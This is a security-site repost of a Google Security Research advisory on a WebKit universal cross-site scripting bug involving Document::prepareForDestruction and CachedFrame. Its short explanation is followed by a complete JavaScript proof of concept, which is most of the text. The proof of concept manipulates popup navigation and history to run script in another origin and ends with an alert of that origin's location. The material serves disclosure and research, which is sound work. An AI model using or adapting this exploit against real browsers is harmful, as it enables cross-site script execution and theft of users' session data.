首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WebKit Document::prepareForDestruction / CachedFrame Universal XSS
来源:Google Security Research 作者:lokihardt 发布时间:2017-06-01  
WebKit: UXSS via Document::prepareForDestruction and CachedFrame 




Here's a snippet of Document::prepareForDestruction

void Document::prepareForDestruction()
{
    if (m_hasPreparedForDestruction)
        return;
    ...
    detachFromFrame();

    m_hasPreparedForDestruction = true;
}

Document::prepareForDestruction is called on the assumption that the document will not be used again with its frame. However, if a frame caching is made in Document::prepareForDestruction, the document's frame will be stored in a CachedFrame object that will reattach the frame at some point, and thereafter, the document's frame will be never detached due to |m_hasPreparedForDestruction|.


PoC:
<body>
Click anywhere.
<script>
function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

function waitFor(check, cb) {
    let it = setInterval(() => {
        if (check()) {
            clearInterval(it);
            cb();
        }
    }, 10);
}

window.onclick = () => {
    window.onclick = null;

    w = open(createURL(''), '', 'width=500, height=500');
    w.onload = () => {
        setTimeout(() => {
            let f = w.document.body.appendChild(document.createElement('iframe'));
            f.contentWindow.onunload = () => {
                f.contentWindow.onunload = null;

                w.__defineGetter__('navigator', () => new Object());

                let a = w.document.createElement('a');
                a.href = 'about:blank';
                a.click();

                setTimeout(() => {
                    w.history.back();
                    setTimeout(() => {
                        let d = w.document;
                        w.location = 'javascript:' + encodeURI(`"<script>location = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a></scrip` + `t>"`);

                        let it = setInterval(() => {
                            try {
                                w.xxxx;
                            } catch (e) {
                                clearInterval(it);

                                let a = d.createElement('a');
                                a.href = 'javascript:alert(location);';
                                a.click();
                            }
                        }, 10);
                    }, 100);
                }, 100);
            };

            w.location = 'javascript:""';
        }, 0);
    };

}

</script>
</body>

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ModX CMS Proof Of Concept Shel
·WebKit JSC JSObject::ensureLen
·IBM Informix Dynamic Server /
·WebKit JSC emitPutDerivedConst
·TerraMaster F2-420 NAS TOS 3.0
·WebKit CachedFrame Universal C
·KEMP LoadMaster 7.135.0.13245
·WebKit Element::setAttributeNo
·Microsoft MsMpEng - Remotely E
·WebKit CachedFrameBase::restor
·TiEmu 2.08 - Local Buffer Over
·Riverbed SteelHead VCX 9.6.0a
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved